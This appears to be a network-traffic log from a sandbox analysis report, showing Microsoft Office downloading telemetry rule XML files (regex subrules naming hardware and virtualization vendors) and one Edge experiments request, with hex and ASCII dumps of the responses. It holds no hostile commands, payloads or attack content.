2024-11-09 01:47:26 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:26 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: a4ba0423-501e-0029-6446-2cd0b8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014726Z-16547b76f7fcjqqhhC1DFWrrrc0000000ac000000000mrn9 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:26 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.7	49777	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:26 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:26 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:26 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: fc40c2e6-501e-0047-2aae-31ce6c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014726Z-15869dbbcc6hgzkhhC1DFWgtqs00000001wg000000005g6c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:26 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.7	49779	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:26 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:26 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:26 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: d07841a0-401e-0064-490f-2d54af000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014726Z-16547b76f7fr28cchC1DFWnuws0000000ap0000000002yfk x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:26 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.7	49789	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:27 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:27 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: 29e284b5-001e-0065-5703-2d0b73000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014727Z-16547b76f7fp46ndhC1DFW66zg0000000adg00000000p5n0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:27 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=
2024-11-09 01:47:54 UTC	192	OUT	GET /rules/rule703051v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:54 UTC	515	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:54 GMT Content-Type: text/xml Content-Length: 1428 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE07B8722" x-ms-request-id: 5ffa534b-901e-0064-29dd-30e8a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014754Z-15869dbbcc662ldwhC1DFWh4e000000000ug00000000hgpz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-09 01:47:54 UTC	1428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 35 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 45 78 63 65 6c 2e 49 6e 73 69 67 68 74 73 53 65 72 76 69 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703051" V="3" DC="SM" EN="Office.Telemetry.Event.Office.Excel.InsightsServices.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nex

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.7	49791	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:27 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:27 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: e6dbc9be-001e-0017-395c-2e0c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014727Z-15869dbbcc6bdtw9hC1DFW9m4s00000002hg00000000abp8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:27 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.7	49790	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:27 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:27 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: 0cf77bbd-b01e-005c-1be1-2e4c66000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014727Z-17df447cdb5bz95mhC1DFWnk7w00000006hg00000000nsam x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:27 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.7	49788	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:27 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:27 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:27 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 4a1cb9ec-a01e-0021-5a00-2d814c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014727Z-16547b76f7fx6rhxhC1DFW76kg0000000aa000000000v6vz x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:27 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
2024-11-09 01:47:54 UTC	192	OUT	GET /rules/rule701850v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:54 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:54 GMT Content-Type: text/xml Content-Length: 1371 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE374A8B3" x-ms-request-id: cc8be6ed-301e-006e-3615-2ff018000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014754Z-17df447cdb54qlp6hC1DFWqcfc00000006qg00000000kazs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:54 UTC	1371	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 45 78 63 65 6c 2e 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 45 78 63 65 6c 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701850" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Excel.Mobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenExcelMobile" S="Medium" /> <F

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.7	49787	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:27 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:27 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 0386ab83-901e-007b-1455-2eac50000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014727Z-15869dbbcc6vr5dxhC1DFWqn64000000058000000000any2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:27 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.7	49780	94.245.104.56	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:27 UTC	428	OUT	GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1 Host: api.edgeoffer.microsoft.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:27 UTC	725	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Content-Type: application/x-protobuf; charset=utf-8 Date: Sat, 09 Nov 2024 01:47:27 GMT Server: Microsoft-IIS/10.0 Set-Cookie: ARRAffinity=e5e4197507aadfd116f59447fade3d01fe97a8db2e83bfcd54af3bd128319bb7;Path=/;HttpOnly;Domain=api.edgeoffer.microsoft.com Set-Cookie: ARRAffinity=8b656f4ecf6270dbe9097aac1834960f61903fdb6f6ce3be7cbc242f17e7233a;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com Set-Cookie: ARRAffinitySameSite=8b656f4ecf6270dbe9097aac1834960f61903fdb6f6ce3be7cbc242f17e7233a;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9 X-Powered-By: ASP.NET

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.7	49795	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:28 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:28 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:28 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: 9ba15ece-101e-0034-5d08-2c96ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014728Z-16547b76f7fj5p7mhC1DFWf8w40000000ahg00000000fyta x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:28 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
2024-11-09 01:47:55 UTC	192	OUT	GET /rules/rule702101v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:55 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:55 GMT Content-Type: text/xml Content-Length: 1408 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT ETag: "0x8DC582BE7F89AC4" x-ms-request-id: 66bf4b2d-101e-0079-2c09-2c5913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014755Z-16547b76f7fdf69shC1DFWcpd00000000aa000000000n2ec x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
